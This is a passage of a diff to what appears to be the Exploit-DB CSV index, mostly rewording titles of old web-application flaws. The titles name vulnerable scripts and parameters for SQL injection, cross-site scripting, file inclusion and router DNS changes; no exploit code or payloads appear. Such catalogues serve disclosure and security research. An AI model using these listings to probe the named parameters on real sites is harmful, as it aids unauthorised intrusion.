'printmain.asp?ID' SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 +29111,platforms/asp/webapps/29111.txt,"Grandora Rialto 1.6 - 'searchkey.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",asp,webapps,0 +29112,platforms/asp/webapps/29112.txt,"Grandora Rialto 1.6 - 'searchmain.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",asp,webapps,0 +29113,platforms/asp/webapps/29113.txt,"Grandora Rialto 1.6 - 'searchoption.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",asp,webapps,0 +29114,platforms/asp/webapps/29114.txt,"Grandora Rialto 1.6 - 'listmain.asp?cat' Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 +29115,platforms/asp/webapps/29115.txt,"Grandora Rialto 1.6 - 'searchkey.asp?Keyword' Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 +29116,platforms/asp/webapps/29116.txt,"Grandora Rialto 1.6 - 'searchmain.asp?cat' Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 +29117,platforms/asp/webapps/29117.txt,"Grandora Rialto 1.6 - 'forminfo.asp?refno' Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 +29119,platforms/asp/webapps/29119.txt,"Enthrallweb eClassifieds - 'dircat.asp?cid' SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 +29120,platforms/asp/webapps/29120.txt,"Enthrallweb eClassifieds - 'dirSub.asp?sid' SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 +29121,platforms/asp/webapps/29121.txt,"Enthrallweb eHomes - 'homeDetail.asp?AD_ID' SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 +29122,platforms/asp/webapps/29122.txt,"Enthrallweb eHomes - 'compareHomes.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",asp,webapps,0 +29123,platforms/asp/webapps/29123.txt,"Enthrallweb eHomes - 'result.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",asp,webapps,0 +29124,platforms/asp/webapps/29124.txt,"Enthrallweb eHomes - 'result.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-11-20,"laurent gaffie",asp,webapps,0 29126,platforms/asp/webapps/29126.txt,"Gnews Publisher - Multiple SQL Injections",2006-11-20,"Aria-Security Team",asp,webapps,0 -29128,platforms/php/webapps/29128.txt,"Vikingboard 0.1.2 - admin.php act Parameter Traversal Arbitrary File Access",2006-11-20,"laurent gaffie",php,webapps,0 +29128,platforms/php/webapps/29128.txt,"Vikingboard 0.1.2 - 'admin.php?act' Traversal Arbitrary File Access",2006-11-20,"laurent gaffie",php,webapps,0 29131,platforms/hardware/webapps/29131.rb,"ARRIS DG860A - NVRAM Backup Password Disclosure",2013-10-22,"Justin Oberdorf",hardware,webapps,80 29133,platforms/asp/webapps/29133.txt,"Rapid Classified 3.1 - 'viewad.asp' SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29134,platforms/asp/webapps/29134.txt,"Rapid Classified 3.1 - 'view_print.asp' Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 @@ -31049,28 +31050,28 @@ id,file,description,date,author,platform,type,port 29137,platforms/asp/webapps/29137.txt,"Rapid Classified 3.1 - 'advsearch.asp' Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 29157,platforms/php/webapps/29157.txt,"Seditio 1.10 - Users.Profile.Inc.php SQL Injection",2006-11-21,"Mustafa Can Bjorn",php,webapps,0 29158,platforms/php/webapps/29158.txt,"CuteNews 1.4.5 - 'show_news.php' Cross-Site Scripting",2006-11-21,"Alireza Hassani",php,webapps,0 -29159,platforms/php/webapps/29159.txt,"CuteNews 1.4.5 - 'rss_title' Parameter Cross-Site Scripting",2006-11-21,"Alireza Hassani",php,webapps,0 -29141,platforms/asp/webapps/29141.txt,"The Classified Ad System 3.0 - default.asp Multiple Parameter Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 -29142,platforms/asp/webapps/29142.txt,"Klf-Realty 2.0 - search_listing.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 -29143,platforms/asp/webapps/29143.txt,"Klf-Realty 2.0 - detail.asp property_id Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 +29159,platforms/php/webapps/29159.txt,"CuteNews 1.4.5 - 'rss_title' Cross-Site Scripting",2006-11-21,"Alireza Hassani",php,webapps,0 +29141,platforms/asp/webapps/29141.txt,"The Classified Ad System 3.0 - 'default.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-11-20,"laurent gaffie",asp,webapps,0 +29142,platforms/asp/webapps/29142.txt,"Klf-Realty 2.0 - 'search_listing.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",asp,webapps,0 +29143,platforms/asp/webapps/29143.txt,"Klf-Realty 2.0 - 'detail.asp?property_id' SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29145,platforms/php/webapps/29145.txt,"Wabbit PHP Gallery 0.9 - Dir Parameter Directory Traversal",2006-11-20,the_Edit0r,php,webapps,0 29162,platforms/php/webapps/29162.txt,"My Little Weblog 2006.11.21 - Weblog.php Cross-Site Scripting",2006-11-21,the_Edit0r,php,webapps,0 -29217,platforms/php/webapps/29217.txt,"CuteNews 1.3.6 - 'result' Parameter Cross-Site Scripting",2006-12-02,Detefix,php,webapps,0 +29217,platforms/php/webapps/29217.txt,"CuteNews 1.3.6 - 'result' Cross-Site Scripting",2006-12-02,Detefix,php,webapps,0 29218,platforms/php/webapps/29218.txt,"PHPNews 1.3 - 'Link_Temp.php' Cross-Site Scripting",2006-12-02,Detefix,php,webapps,0 -29219,platforms/asp/webapps/29219.txt,"DUdownload 1.0/1.1 - 'detail.asp' Multiple Parameter SQL Injections",2006-12-02,"Aria-Security Team",asp,webapps,0 +29219,platforms/asp/webapps/29219.txt,"DUdownload 1.0/1.1 - 'detail.asp' Multiple SQL Injections",2006-12-02,"Aria-Security Team",asp,webapps,0 29220,platforms/asp/webapps/29220.html,"Metyus Okul Yonetim 1.0 - Sistemi Uye_giris_islem.asp SQL Injection",2006-12-04,ShaFuck31,asp,webapps,0 -29165,platforms/php/webapps/29165.txt,"PMOS Help Desk 2.3 - ticketview.php Multiple Parameter Cross-Site Scripting",2006-11-22,SwEET-DeViL,php,webapps,0 -29166,platforms/php/webapps/29166.txt,"PMOS Help Desk 2.3 - ticket.php email Parameter Cross-Site Scripting",2006-11-22,SwEET-DeViL,php,webapps,0 -29992,platforms/php/webapps/29992.txt,"Campsite 2.6.1 - SubscriptionSection.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29993,platforms/php/webapps/29993.txt,"Campsite 2.6.1 - SystemPref.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29165,platforms/php/webapps/29165.txt,"PMOS Help Desk 2.3 - 'ticketview.php' Multiple Cross-Site Scripting Vulnerabilities",2006-11-22,SwEET-DeViL,php,webapps,0 +29166,platforms/php/webapps/29166.txt,"PMOS Help Desk 2.3 - 'ticket.php?email' Cross-Site Scripting",2006-11-22,SwEET-DeViL,php,webapps,0 +29992,platforms/php/webapps/29992.txt,"Campsite 2.6.1 - 'SubscriptionSection.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29993,platforms/php/webapps/29993.txt,"Campsite 2.6.1 - 'SystemPref.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29216,platforms/asp/webapps/29216.html,"Aspee Ziyaretci Defteri - giris.asp Multiple Field SQL Injections",2006-12-01,ShaFuq31,asp,webapps,0 -29173,platforms/php/webapps/29173.txt,"Active PHP BookMarks 1.1.2 - Multiple Remote File Inclusion",2006-11-23,ThE-LoRd-Of-CrAcKiNg,php,webapps,0 -29174,platforms/asp/webapps/29174.txt,"MidiCart ASP - Item_Show.asp ID2006quant Parameter SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 +29173,platforms/php/webapps/29173.txt,"Active PHP BookMarks 1.1.2 - Multiple Remote File Inclusions",2006-11-23,ThE-LoRd-Of-CrAcKiNg,php,webapps,0 +29174,platforms/asp/webapps/29174.txt,"MidiCart ASP - 'Item_Show.asp?ID2006quant' SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 29175,platforms/php/webapps/29175.txt,"Simple PHP Gallery 1.1 - System SP_Index.php Cross-Site Scripting",2006-11-24,"Al7ejaz Hacker",php,webapps,0 29176,platforms/asp/webapps/29176.txt,"ASP ListPics 5.0 - Listpics.asp SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 29177,platforms/php/webapps/29177.txt,"MMGallery 1.55 - Thumbs.php Cross-Site Scripting",2006-11-24,"Al7ejaz Hacker",php,webapps,0 -29178,platforms/asp/webapps/29178.txt,"Fixit iDms Pro Image Gallery - filelist.asp Multiple Parameter SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 -29179,platforms/asp/webapps/29179.txt,"Fixit iDms Pro Image Gallery - showfile.asp fid Parameter SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 +29178,platforms/asp/webapps/29178.txt,"Fixit iDms Pro Image Gallery - 'filelist.asp' Multiple SQL Injections",2006-11-24,"Aria-Security Team",asp,webapps,0 +29179,platforms/asp/webapps/29179.txt,"Fixit iDms Pro Image Gallery - 'showfile.asp?fid' SQL Injection",2006-11-24,"Aria-Security Team",asp,webapps,0 29180,platforms/asp/webapps/29180.txt,"SIAP CMS - 'login.asp' SQL Injection",2006-11-25,nagazakig74,asp,webapps,0 29181,platforms/php/webapps/29181.txt,"cPanel 11 Beta - Multiple Cross-Site Scripting Vulnerabilities",2006-11-25,"Aria-Security Team",php,webapps,0 29182,platforms/php/webapps/29182.txt,"cPanel WebHost Manager 3.1 - dochangeemail email Parameter Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps,0 @@ -31084,60 +31085,60 @@ id,file,description,date,author,platform,type,port 29191,platforms/asp/webapps/29191.txt,"ClickContact - 'default.asp' Multiple SQL Injections",2006-11-27,"Aria-Security Team",asp,webapps,0 29192,platforms/asp/webapps/29192.txt,"Clickblog - Displaycalendar.asp SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0 29193,platforms/asp/webapps/29193.txt,"Click Gallery - Multiple Input Validation Vulnerabilities",2006-11-27,"Aria-Security Team",asp,webapps,0 -29195,platforms/asp/webapps/29195.txt,"uPhotoGallery 1.1 - Slideshow.asp ci Parameter SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0 -29196,platforms/asp/webapps/29196.txt,"uPhotoGallery 1.1 - thumbnails.asp ci Parameter SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0 +29195,platforms/asp/webapps/29195.txt,"uPhotoGallery 1.1 - 'Slideshow.asp?ci' SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0 +29196,platforms/asp/webapps/29196.txt,"uPhotoGallery 1.1 - 'thumbnails.asp?ci' SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0 29197,platforms/asp/webapps/29197.txt,"Evolve Shopping Cart - products.asp SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0 -29198,platforms/php/webapps/29198.txt,"b2evolution 1.8.2/1.9 - _404_not_found.page.php Multiple Parameter Cross-Site Scripting",2006-11-16,"lotto fischer",php,webapps,0 -29199,platforms/php/webapps/29199.txt,"b2evolution 1.8.2/1.9 - _410_stats_gone.page.php app_name Parameter Cross-Site Scripting",2006-11-16,"lotto fischer",php,webapps,0 +29198,platforms/php/webapps/29198.txt,"b2evolution 1.8.2/1.9 - '_404_not_found.page.php' Multiple Cross-Site Scripting Vulnerabilities",2006-11-16,"lotto fischer",php,webapps,0 +29199,platforms/php/webapps/29199.txt,"b2evolution 1.8.2/1.9 - '_410_stats_gone.page.php?app_name' Cross-Site Scripting",2006-11-16,"lotto fischer",php,webapps,0 40371,platforms/cgi/webapps/40371.sh,"Tenda ADSL2/2+ Modem 963281TAN - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80 -29200,platforms/php/webapps/29200.txt,"b2evolution 1.8.2/1.9 - _referer_spam.page.php Multiple Parameter Cross-Site Scripting",2006-11-16,"lotto fischer",php,webapps,0 +29200,platforms/php/webapps/29200.txt,"b2evolution 1.8.2/1.9 - '_referer_spam.page.php' Multiple Cross-Site Scripting Vulnerabilities",2006-11-16,"lotto fischer",php,webapps,0 29202,platforms/php/webapps/29202.txt,"Seditio1.10 / Land Down 8.0 Under - polls.php SQL Injection",2006-11-30,ajann,php,webapps,0 29203,platforms/php/webapps/29203.php,"Woltlab Burning Board 2.3.x - register.php Cross-Site Scripting",2006-11-30,blueshisha,php,webapps,0 29205,platforms/php/webapps/29205.txt,"Invision Gallery 2.0.7 - 'index.php' IMG Parameter SQL Injection",2006-12-01,infection,php,webapps,0 29262,platforms/hardware/webapps/29262.pl,"Pirelli Discus DRG A125g - Password Disclosure",2013-10-28,"Sebastián Magof",hardware,webapps,0 29207,platforms/php/webapps/29207.txt,"DZCP (deV!L_z Clanportal) 1.3.6 - Show Parameter SQL Injection",2006-12-01,"Tim Weber",php,webapps,0 29231,platforms/asp/webapps/29231.txt,"Dol Storye - 'Dettaglio.asp' Multiple SQL Injections",2006-12-06,WarGame,asp,webapps,0 -29232,platforms/php/webapps/29232.txt,"Link CMS - navigacija.php IDMeniGlavni Parameter SQL Injection",2006-11-18,"Ivan Markovic",php,webapps,0 -29233,platforms/php/webapps/29233.txt,"Link CMS - prikazInformacije.php IDStranicaPodaci Parameter SQL Injection",2006-11-18,"Ivan Markovic",php,webapps,0 +29232,platforms/php/webapps/29232.txt,"Link CMS - 'navigacija.php?IDMeniGlavni' SQL Injection",2006-11-18,"Ivan Markovic",php,webapps,0 +29233,platforms/php/webapps/29233.txt,"Link CMS - 'prikazInformacije.php?IDStranicaPodaci' SQL Injection",2006-11-18,"Ivan Markovic",php,webapps,0 29223,platforms/php/webapps/29223.txt,"Inside Systems Mail 2.0 - error.php Cross-Site Scripting",2006-12-04,"Vicente Aguilera Diaz",php,webapps,0 29224,platforms/asp/webapps/29224.txt,"UApplication Uguestbook 1.0 - index.asp SQL Injection",2006-12-04,"Aria-Security Team",asp,webapps,0 -29225,platforms/php/webapps/29225.txt,"ac4p Mobile - up.php Taaa Parameter Cross-Site Scripting",2006-12-04,SwEET-DeViL,php,webapps,0 -29226,platforms/php/webapps/29226.txt,"ac4p Mobile - 'polls.php' Multiple Parameter Cross-Site Scripting (2)",2006-12-04,SwEET-DeViL,php,webapps,0 -29227,platforms/asp/webapps/29227.txt,"Vt-Forum Lite 1.3 - vf_info.asp StrMes Parameter Cross-Site Scripting",2006-12-04,St@rExT,asp,webapps,0 +29225,platforms/php/webapps/29225.txt,"ac4p Mobile - 'up.php?Taaa' Cross-Site Scripting",2006-12-04,SwEET-DeViL,php,webapps,0 +29226,platforms/php/webapps/29226.txt,"ac4p Mobile - 'polls.php' Multiple Cross-Site Scripting Vulnerabilities (2)",2006-12-04,SwEET-DeViL,php,webapps,0 +29227,platforms/asp/webapps/29227.txt,"Vt-Forum Lite 1.3 - 'vf_info.asp?StrMes' Cross-Site Scripting",2006-12-04,St@rExT,asp,webapps,0 29228,platforms/asp/webapps/29228.txt,"Vt-Forum Lite 1.3 - vf_newtopic.asp IFRAME Element Cross-Site Scripting",2006-12-04,St@rExT,asp,webapps,0 29328,platforms/php/webapps/29328.txt,"ImpressPages CMS 3.6 - Arbitrary File Deletion",2013-11-01,LiquidWorm,php,webapps,0 29237,platforms/php/webapps/29237.txt,"cPanel 11 BoxTrapper - Manage.HTML Cross-Site Scripting",2006-12-08,"Aria-Security Team",php,webapps,0 29238,platforms/php/webapps/29238.txt,"cPanel Web Hosting Manager 3.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-12-08,"Aria-Security Team",php,webapps,0 -29240,platforms/asp/webapps/29240.txt,"Cilem Haber Free Edition - 'hata.asp hata' Parameter Cross-Site Scripting",2006-12-08,ShaFuck31,asp,webapps,0 +29240,platforms/asp/webapps/29240.txt,"Cilem Haber Free Edition - 'hata.asp?hata' Cross-Site Scripting",2006-12-08,ShaFuck31,asp,webapps,0 29241,platforms/asp/webapps/29241.txt,"MaviPortal - Arama.asp Cross-Site Scripting",2006-12-09,St@rExT,asp,webapps,0 -29242,platforms/php/webapps/29242.txt,"Messageriescripthp 2.0 - lire-avis.php aa Parameter SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 -29243,platforms/php/webapps/29243.txt,"Messageriescripthp 2.0 - existepseudo.php pseudo Parameter Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 -29244,platforms/php/webapps/29244.txt,"Messageriescripthp 2.0 - existeemail.php email Parameter Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 -29245,platforms/php/webapps/29245.txt,"Messageriescripthp 2.0 - Contact/contact.php Multiple Parameter Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 -29246,platforms/php/webapps/29246.txt,"AnnonceScriptHP 2.0 - admin/admin_membre/fiche_membre.php idmembre Parameter SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 -29247,platforms/php/webapps/29247.txt,"AnnonceScriptHP 2.0 - erreurinscription.php email Parameter Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 -29248,platforms/php/webapps/29248.txt,"AnnonceScriptHP 2.0 - Templates/admin.dwt.php email Parameter Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 -29249,platforms/php/webapps/29249.txt,"AnnonceScriptHP 2.0 - Templates/commun.dwt.php email Parameter Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 -29250,platforms/php/webapps/29250.txt,"AnnonceScriptHP 2.0 - membre.dwt.php email Parameter Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 -29251,platforms/php/webapps/29251.txt,"AnnonceScriptHP 2.0 - admin/admin_config/Aide.php email Parameter Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 -29252,platforms/php/webapps/29252.txt,"AnnonceScriptHP 2.0 - email.php id Parameter SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 -29253,platforms/php/webapps/29253.txt,"AnnonceScriptHP 2.0 - voirannonce.php no Parameter SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29242,platforms/php/webapps/29242.txt,"Messageriescripthp 2.0 - 'lire-avis.php?aa' SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29243,platforms/php/webapps/29243.txt,"Messageriescripthp 2.0 - 'existepseudo.php?pseudo' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29244,platforms/php/webapps/29244.txt,"Messageriescripthp 2.0 - 'existeemail.php?email' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29245,platforms/php/webapps/29245.txt,"Messageriescripthp 2.0 - 'Contact/contact.php' Multiple Cross-Site Scripting Vulnerabilities",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29246,platforms/php/webapps/29246.txt,"AnnonceScriptHP 2.0 - 'admin/admin_membre/fiche_membre.php?idmembre' SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29247,platforms/php/webapps/29247.txt,"AnnonceScriptHP 2.0 - 'erreurinscription.php?email' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29248,platforms/php/webapps/29248.txt,"AnnonceScriptHP 2.0 - 'Templates/admin.dwt.php?email' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29249,platforms/php/webapps/29249.txt,"AnnonceScriptHP 2.0 - 'Templates/commun.dwt.php?email' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29250,platforms/php/webapps/29250.txt,"AnnonceScriptHP 2.0 - 'membre.dwt.php?email' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29251,platforms/php/webapps/29251.txt,"AnnonceScriptHP 2.0 - 'admin/admin_config/Aide.php?email' Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29252,platforms/php/webapps/29252.txt,"AnnonceScriptHP 2.0 - 'email.php?id' SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29253,platforms/php/webapps/29253.txt,"AnnonceScriptHP 2.0 - 'voirannonce.php?no' SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 29254,platforms/php/webapps/29254.txt,"KDPics 1.11/1.16 - index.php3 categories Parameter Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 29255,platforms/php/webapps/29255.txt,"KDPics 1.11/1.16 - galeries.inc.php3 categories Parameter Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 29258,platforms/php/webapps/29258.txt,"PHP RSS Reader 2010 - SQL Injection",2013-10-28,"mishal abdullah",php,webapps,0 29264,platforms/php/webapps/29264.txt,"Onpub CMS 1.4/1.5 - Multiple SQL Injections",2013-10-28,Vulnerability-Lab,php,webapps,0 29265,platforms/php/webapps/29265.txt,"ILIAS eLearning CMS 4.3.4 < 4.4 - Persistent Cross-Site Scripting",2013-10-29,Vulnerability-Lab,php,webapps,0 29266,platforms/hardware/webapps/29266.txt,"Stem Innovation - 'IZON' Hard-Coded Credentials",2013-10-29,"Mark Stanislav",hardware,webapps,0 -29267,platforms/php/webapps/29267.txt,"ProNews 1.5 - 'admin/change.php' Multiple Parameter Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 +29267,platforms/php/webapps/29267.txt,"ProNews 1.5 - 'admin/change.php' Multiple Cross-Site Scripting Vulnerabilities",2006-12-09,Mr_KaLiMaN,php,webapps,0 29268,platforms/php/webapps/29268.txt,"ProNews 1.5 - 'lire-avis.php' aa Parameter SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0 29269,platforms/php/webapps/29269.txt,"ProNews 1.5 - 'lire-avis.php' aa Parameter Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0 29270,platforms/php/webapps/29270.txt,"MXBB Profile Control Panel 0.91c - Module Remote File Inclusion",2006-12-09,bd0rk,php,webapps,0 29271,platforms/asp/webapps/29271.txt,"AppIntellect SpotLight CRM - 'login.asp' SQL Injection",2006-12-09,ajann,asp,webapps,0 -29272,platforms/php/webapps/29272.txt,"CMS Made Simple 1.0.2 - 'SearchInput' Parameter Cross-Site Scripting",2006-12-11,Nicokiller,php,webapps,0 +29272,platforms/php/webapps/29272.txt,"CMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting",2006-12-11,Nicokiller,php,webapps,0 29280,platforms/php/webapps/29280.txt,"GTX CMS 2013 Optima - SQL Injection",2013-10-29,Vulnerability-Lab,php,webapps,0 29282,platforms/php/webapps/29282.txt,"GenesisTrader 1.0 - form.php Arbitrary File Source Disclosure",2006-12-14,Mr_KaLiMaN,php,webapps,0 -29283,platforms/php/webapps/29283.txt,"GenesisTrader 1.0 - form.php Multiple Parameter Cross-Site Scripting",2006-12-14,Mr_KaLiMaN,php,webapps,0 -29284,platforms/php/webapps/29284.txt,"Moodle 1.5/1.6 - mod/forum/discuss.php navtail Parameter Cross-Site Scripting",2006-12-14,"Jose Miguel Yanez Venegas",php,webapps,0 +29283,platforms/php/webapps/29283.txt,"GenesisTrader 1.0 - 'form.php' Multiple Cross-Site Scripting Vulnerabilities",2006-12-14,Mr_KaLiMaN,php,webapps,0 +29284,platforms/php/webapps/29284.txt,"Moodle 1.5/1.6 - 'mod/forum/discuss.php?navtail' Cross-Site Scripting",2006-12-14,"Jose Miguel Yanez Venegas",php,webapps,0 29288,platforms/asp/webapps/29288.txt,"Omniture SiteCatalyst - Multiple Cross-Site Scripting Vulnerabilities",2006-12-16,"Hackers Center Security",asp,webapps,0 29289,platforms/php/webapps/29289.php,"eXtreme-fusion 4.02 - 'Fusion_Forum_View.php' Local File Inclusion",2006-12-16,Kacper,php,webapps,0 29293,platforms/asp/webapps/29293.txt,"Contra Haber Sistemi 1.0 - Haber.asp SQL Injection",2006-12-16,ShaFuck31,asp,webapps,0 @@ -31151,28 +31152,28 @@ id,file,description,date,author,platform,type,port 29292,platforms/windows/webapps/29292.txt,"XAMPP for Windows 1.8.2 - Blind SQL Injection",2013-10-29,"Sebastián Magof",windows,webapps,0 29306,platforms/php/webapps/29306.txt,"A-Blog 1.0 - Unspecified Cross-Site Scripting",2006-12-22,Fukumori,php,webapps,0 29308,platforms/php/webapps/29308.txt,"Oracle Portal 9i/10g - Container_Tabs.jsp Cross-Site Scripting",2006-12-22,"putosoft softputo",php,webapps,0 -29311,platforms/php/webapps/29311.txt,"Xt-News 0.1 - add_comment.php id_news Parameter Cross-Site Scripting",2006-12-22,Mr_KaLiMaN,php,webapps,0 +29311,platforms/php/webapps/29311.txt,"Xt-News 0.1 - 'add_comment.php?id_news' Cross-Site Scripting",2006-12-22,Mr_KaLiMaN,php,webapps,0 29312,platforms/hardware/webapps/29312.txt,"Unicorn Router WB-3300NR - Cross-Site Request Forgery (Factory Reset/DNS Change)",2013-10-30,absane,hardware,webapps,0 -29313,platforms/php/webapps/29313.txt,"Xt-News 0.1 - show_news.php id_news Parameter Cross-Site Scripting",2006-12-22,Mr_KaLiMaN,php,webapps,0 -29314,platforms/php/webapps/29314.txt,"Xt-News 0.1 - show_news.php id_news Parameter SQL Injection",2006-12-22,Mr_KaLiMaN,php,webapps,0 -29994,platforms/php/webapps/29994.txt,"Campsite 2.6.1 - template.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29995,platforms/php/webapps/29995.txt,"Campsite 2.6.1 - TimeUnit.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29313,platforms/php/webapps/29313.txt,"Xt-News 0.1 - 'show_news.php?id_news' Cross-Site Scripting",2006-12-22,Mr_KaLiMaN,php,webapps,0 +29314,platforms/php/webapps/29314.txt,"Xt-News 0.1 - 'show_news.php?id_news' SQL Injection",2006-12-22,Mr_KaLiMaN,php,webapps,0 +29994,platforms/php/webapps/29994.txt,"Campsite 2.6.1 - 'template.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29995,platforms/php/webapps/29995.txt,"Campsite 2.6.1 - 'TimeUnit.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 29318,platforms/php/webapps/29318.txt,"ImpressPages CMS 3.6 - Multiple Cross-Site Scripting / SQL Injection Vulnerabilities",2013-10-31,LiquidWorm,php,webapps,0 29326,platforms/php/webapps/29326.txt,"Opsview pre 4.4.1 - Blind SQL Injection",2013-10-31,"J. Oquendo",php,webapps,80 30207,platforms/asp/webapps/30207.txt,"FuseTalk 4.0 - blog/include/common/comfinish.cfm FTVAR_SCRIPTRUN Parameter Cross-Site Scripting",2007-06-20,"Ivan Almuina",asp,webapps,0 -30203,platforms/asp/webapps/30203.txt,"Comersus Cart 7.0.7 - comersus_optReviewReadExec.asp id Parameter SQL Injection",2007-06-20,Doz,asp,webapps,0 +30203,platforms/asp/webapps/30203.txt,"Comersus Cart 7.0.7 - 'comersus_optReviewReadExec.asp?id' SQL Injection",2007-06-20,Doz,asp,webapps,0 30204,platforms/asp/webapps/30204.txt,"Comersus Cart 7.0.7 - comersus_customerAuthenticateForm.asp redirectUrl Cross-Site Scripting",2007-06-20,Doz,asp,webapps,0 29330,platforms/php/webapps/29330.txt,"WordPress Theme Switchblade 1.3 - Arbitrary File Upload",2013-11-01,"Byakuya Kouta",php,webapps,0 29331,platforms/php/webapps/29331.txt,"ImpressPages CMS 3.6 - 'manage()' Remote Code Execution",2013-11-01,LiquidWorm,php,webapps,0 29332,platforms/php/webapps/29332.txt,"WordPress Theme Think Responsive 1.0 - Arbitrary File Upload",2013-11-01,"Byakuya Kouta",php,webapps,0 -29333,platforms/asp/webapps/29333.txt,"Efkan Forum 1.0 - 'Grup' Parameter SQL Injection",2006-12-22,ShaFuq31,asp,webapps,0 +29333,platforms/asp/webapps/29333.txt,"Efkan Forum 1.0 - 'Grup' SQL Injection",2006-12-22,ShaFuq31,asp,webapps,0 40370,platforms/cgi/webapps/40370.sh,"PLANET VDR-300NU ADSL Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80 -29334,platforms/cfm/webapps/29334.txt,"Future Internet - index.cfm Multiple Parameter SQL Injection",2006-12-23,Linux_Drox,cfm,webapps,0 +29334,platforms/cfm/webapps/29334.txt,"Future Internet - 'index.cfm' Multiple SQL Injections",2006-12-23,Linux_Drox,cfm,webapps,0 29335,platforms/cfm/webapps/29335.txt,"Future Internet - index.cfm categoryId Parameter Cross-Site Scripting",2006-12-23,Linux_Drox,cfm,webapps,0 29336,platforms/asp/webapps/29336.txt,"Chatwm 1.0 - SelGruFra.asp SQL Injection",2006-12-24,ShaFuq31,asp,webapps,0 29337,platforms/php/webapps/29337.txt,"TimberWolf 1.2.2 - shownews.php Cross-Site Scripting",2006-12-24,CorryL,php,webapps,0 29338,platforms/php/webapps/29338.txt,"vBulletin 3.5.x/3.6.x - SWF Script Injection",2006-12-25,"Ashraf Morad",php,webapps,0 -29342,platforms/php/webapps/29342.txt,"Luckybot 3 - DIR Parameter Multiple Remote File Inclusion",2006-12-26,Red_Casper,php,webapps,0 +29342,platforms/php/webapps/29342.txt,"Luckybot 3 - 'DIR' Multiple Remote File Inclusions",2006-12-26,Red_Casper,php,webapps,0 29343,platforms/php/webapps/29343.txt,"phpCMS 1.1.7 - 'counter.php' Remote File 